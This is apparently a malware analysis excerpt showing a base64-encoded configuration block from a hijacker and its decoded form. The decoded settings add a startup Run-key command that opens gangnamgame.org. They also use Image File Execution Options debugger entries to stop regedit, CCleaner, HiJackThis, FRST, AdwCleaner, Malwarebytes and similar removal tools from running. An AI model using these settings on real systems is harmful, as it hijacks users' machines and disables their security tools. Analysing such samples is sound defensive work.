- <appSettings>
- <add key="Days" value="NQ=="/>
- <add key="RPath" value="U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu"/>
- <add key="RPath2" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xyZWdlZGl0LmV4ZQ=="/>
- <add key="RPath3" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhdnouZXhl"/>
- <add key="RPath4" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lci5leGU="/>
- <add key="RPath5" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xDQ2xlYW5lcjY0LmV4ZQ=="/>
- <add key="RPath6" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSZWdXb3Jrcy5leGU="/>
- <add key="RPath7" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBdXRvTG9nZ2VyLmV4ZQ=="/>
- <add key="RPath8" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xIaUphY2tUaGlzLmV4ZQ=="/>
- <add key="RPath9" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xBblZpci5leGU="/>
- <add key="RPath10" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNULmV4ZQ=="/>
- <add key="RPath11" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xGUlNUNjQuZXhl"/>
- <add key="RPath12" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lULmV4ZQ=="/>
- <add key="RPath13" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xSU0lUeDY0LmV4ZQ=="/>
- <add key="RPath14" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xhZHdjbGVhbmVyXzUuMDA1LmV4ZQ=="/>
- <add key="RPath15" value="U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cSW1hZ2UgRmlsZSBFeGVjdXRpb24gT3B0aW9uc1xtYmFtLmV4ZQ=="/>
- <add key="RName" value="Q01E"/>
- <add key="RValue" value="Y21kLmV4ZSAvYyBzdGFydCBodHRwOi8vZ2FuZ25hbWdhbWUub3JnICYmIGV4aXQ="/>
- <add key="RNameX" value="RGVidWdnZXI="/>
- <add key="RValueX" value="c3ZjaG9zdC5leGU="/>
- </appSettings>
- After decoding
- <appSettings>
- <add key="Days" value="5"/>
- <add key="RPath" value="Software\Microsoft\Windows\CurrentVersion\Run"/>
- <add key="RPath2" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe"/>
- <add key="RPath3" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avz.exe"/>
- <add key="RPath4" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe"/>
- <add key="RPath5" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe"/>
- <add key="RPath6" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegWorks.exe"/>
- <add key="RPath7" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutoLogger.exe"/>
- <add key="RPath8" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HiJackThis.exe"/>
- <add key="RPath9" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AnVir.exe"/>
- <add key="RPath10" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST.exe"/>
- <add key="RPath11" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRST64.exe"/>
- <add key="RPath12" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSIT.exe"/>
- <add key="RPath13" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RSITx64.exe"/>
- <add key="RPath14" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe"/>
- <add key="RPath15" value="SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe"/>
- <add key="RName" value="CMD"/>
- <add key="RValue" value="cmd.exe /c start http://gangnamgame.org && exit"/>
- <add key="RNameX" value="Debugger"/>
- <add key="RValueX" value="svchost.exe"/>
- </appSettings>